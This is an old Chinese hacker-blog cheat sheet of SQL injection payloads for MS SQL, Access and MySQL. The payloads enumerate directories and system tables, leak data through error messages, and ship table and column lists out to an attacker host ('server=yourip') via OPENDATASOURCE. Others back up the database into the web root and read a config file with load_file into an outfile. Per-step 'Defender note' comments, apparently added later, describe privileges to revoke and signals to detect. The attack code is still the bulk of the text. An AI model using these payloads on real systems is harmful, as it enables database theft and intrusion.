
img net0r

Some useful techniques in sql injection [个人总结简洁版]

发表于2004/7/16 16:57:00  747人阅读

分类: 我的收藏-->Hacker's log

-- Step 1a: stage directory listings server-side for later extraction.
-- The scratch table dirs receives the two-column result set of the
-- xp_dirtree extended stored procedure (called with the drive/path to list;
-- the quoted Chinese text is the author's placeholder for that path).
-- Defender note: this needs CREATE TABLE and EXECUTE on xp_dirtree for the
-- login the application uses; revoking both from the web login stops the
-- technique here, and any xp_dirtree call from that login is worth an alert.
1.a.  create table dirs (dir varchar(100),dirid int)
insert dirs exec xp_dirtree '想获取该目录的磁盘'’
-- Accumulator used in step 1b to fold the staged rows into one string.
declare @dir varchar(500)

-------
-- Step 1b: fold the staged rows into one delimited string
-- ("dir:dirid|dir:dirid|...") via a variable-concatenation SELECT, then
-- force an int + varchar conversion so the string is returned inside the
-- conversion error text rather than as a result set.
-- Defender note: the channel is the verbose error message; an application
-- that returns only generic errors to the client closes it, and a conversion
-- error whose payload is a '|'-delimited path list is a recognisable log line.
b.   set @dir=''
select @dir=@dir+dir+':'+ltrim(str(dirid))+'|' from dirs where dir>@dir
select 1+@dir

------or

-- Alternative to 1b: add an identity column so staged rows can be addressed
-- one at a time. The nested TOP n ... ORDER BY num DESC picks the n-th row;
-- [1,2,3...] is the author's placeholder for the row index to substitute.
-- Defender note: ALTER TABLE on a scratch table followed by a run of
-- near-identical TOP n probes from one session is a useful detection
-- signature when statement logging is enabled.
alter table dirs add num int identity constraint num primary key

select  top  1 dir from ( select top[1,2,3...] dir,num from dirs) T order by num desc

-- Step 1c: move catalog data out-of-band instead of reading it back through
-- the application. tmptable mirrors the (name, id) shape of the rows it will
-- receive from sysobjects.
c. create table tmptable ( name char(200),id int not null)

-- OPENDATASOURCE makes the database server open a second connection to
-- server=yourip (placeholder) with the uid/pwd given in the connection string
-- and INSERTs the user-table list (xtype='U') into that remote tmptable.
-- Defender note: this requires ad hoc distributed queries to be enabled and
-- outbound TCP/1433 from the database host. Disable the "Ad Hoc Distributed
-- Queries" option and egress-filter the DB server; an outbound SQL connection
-- originating from the database host is itself a high-signal alert.
insert into opendatasource('sqloledb','driver={sql server};server=yourip;network=sbmssocn;address=yourip,1433;uid=guest;pwd='';database=master').master.dbo.tmptable select [name],[id] from sysobjects where xtype='U' --

-- Empty structural copy of syscolumns (where 1=2 matches no row).
select *  into [tmpcolumns]from syscolumns where 1=2

-- Same remote channel, now shipping the column names of one table whose id
-- was obtained from the sysobjects listing above.
insert into opendatasource('sqloledb','driver={sql server};server=yourip;network=sbmssocn;address=yourip,1433;uid=guest;pwd='';database=master').master.dbo.tmpcolumns select name from syscolumns where id=' the id of table you wanna know'

-- Writes a full backup of the current database to a file whose path the author
-- describes as the site's absolute path, i.e. a web-served directory.
-- Defender note: the SQL Server service account should have no write access
-- to web-served directories and the application login should not hold
-- BACKUP DATABASE rights; a .bak file appearing under the web root is a clear
-- indicator of this step.
declare @a sysname; set @a=db_name();backup database @a to disk='网站的绝对路径';--// e.g.: e:/web/down.bak;--

2.
-- Section 2: catalog enumeration one value at a time. The nested
-- TOP 2 / TOP 1 ... ORDER BY id DESC pair returns the second user table;
-- raising the inner TOP walks the list. db_id/db_name map database names
-- to ids and back; col_name resolves a column by ordinal ([1,2,..] is the
-- author's placeholder, the quoted Chinese text stands for a table name).
-- Defender note: an application login querying sysobjects/syscolumns,
-- db_id/db_name or col_name is outside any normal application workload and
-- is a good candidate for a detection rule.
select top 1 name from (select top 2 name,id from sysobjects where xtype='U') T order by id desc
select top 2 name,id from sysobjects where xtype='U'
select db_id('master')
select db_name(17)

select col_name(oject_id('你要获取字段的表名'),[1,2,..])
-- Identity of the connection. Defender note: if this shows the application
-- running as sa/dbo, that over-privileged login is the root-cause finding.
select current_user,user,user_name(),system_user

-- Cursor-based variant of the table listing: a scrollable cursor over the
-- user-table names so individual rows can be fetched by position.
-- Defender note: DECLARE CURSOR / OPEN issued through an application login
-- is unusual traffic and belongs in the same catalog-access detection rule
-- as the sysobjects queries above.
DECLARE m  scroll CURSOR FOR
select name from sysobjects where xtype='U'
open m
DEALLOCATE m
fetch first from m

3. http://www.itlearner.com/work/hexsql.asp // a decent link for charset encoding

http://whois.webhosting.info

-- Section 4: dialect-specific conditionals and file access.
-- CASE ... WHEN: portable form of a true/false probe.
4.select case 1+1 when 1 then '1' else '0' end;

-- iif / asc / mid (and the unbalanced closing paren): Jet/Access syntax, a
-- boolean probe on the first character of username in table admin.
select top 1 iif(asc(mid(username,1,1))>96,1,username) from admin)>0

-- if / STRCMP: MySQL syntax for the same kind of probe.
select if(STRCMP('net0r','netor1'),'not netor','is netor');

-- MySQL: load_file() reads a server-side file whose path is spelled as
-- char() codes, and INTO OUTFILE writes the result under c:/web.
-- Defender note: both need the FILE privilege — do not grant it to the
-- application account, set secure_file_priv, and run mysqld under an account
-- with no write access to web directories. char()-spelled string literals
-- and INTO OUTFILE in application traffic are both worth WAF/log alerts.
SELECT 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) FROM user WHERE userid=1 into outfile 'c:/web/cfg.txt'
